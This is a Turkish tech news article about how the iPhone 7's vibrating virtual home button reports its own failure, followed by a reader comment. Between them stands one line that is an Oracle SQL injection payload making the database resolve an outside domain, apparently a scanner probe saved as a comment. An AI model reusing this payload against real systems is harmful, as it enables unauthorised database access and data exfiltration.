iPhone 7'nin Home Tuşu Bozulduğunda Kullanıcıları Ne Yapacak?

Bildiğiniz üzere Apple, iPhone 7 ve 7 Plus'ta titreşimli bir sanal home tuşu ile karşımıza çıkmıştı. Peki Home tuşunuz bozulursa ne olacak?
16 Ekim 2016 16:04
iPhone 7nin Home Tuşu Bozulduğunda Kullanıcıları Ne Yapacak?
Teknoloji devi Apple, ilk nesilden beri süre gelen home tuşunda ilk defa büyük bir değişikliğe giderek iPhone 7 ile birlikte sanal bir tuşa yer verdi.
 
Apple'ın yeni nesil titreşimli tuşu
 
İlk olarak 2015 yılında piyasaya çıkan MacBook ve Macbook Pro'larda yer alan force touch trackpad ile kullanımına başlanılan teknoloji, daha sonrasında iPhone 7'lere taptic engine dahil edilmesi ile birlikte iPhone 7'lerde de kullanılmaya başlandı. Yeni teknoloji ile birlikte home tuşu artık titreşerek gerçek bir tuş hissiyatı vermeye çalışıyor.
 
Özellikle eski home tuşları bozulmasın diye AssistiveTouch'ı aktifleştiren kullanıcıların iPhone 7'de endişe etmesine gerek var mı ? Bu gerçek olmayan tuş bozulursa ne olacak ?
 
 
Tuş bozulduğunu algılıyor
 
Apple'ın yeni geliştirdiği home tuşu, bozulduğunu anlayarak kullanıcıya bir uyarı verecek. Home tuşu bozuduğu zaman kullanıcı durumla ilgili bilgilendirilecek ve ekranın aşağısında bir sanal tuş belirecek. Bu şekilde tıpkı AssistiveTouch gibi sanal bir tuş ile ekran üzerinden ihtiyacınızı görebileceksiniz. 
shiftdelete.net
177474
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
21 Ekim 2017, Cumartesi 18:17
cihazı sıfırladım home tuşu çalışmıyor kurulum gerçekleştiremiyorum ne yapmam gerek,
Bu haberler ilginizi çekebilir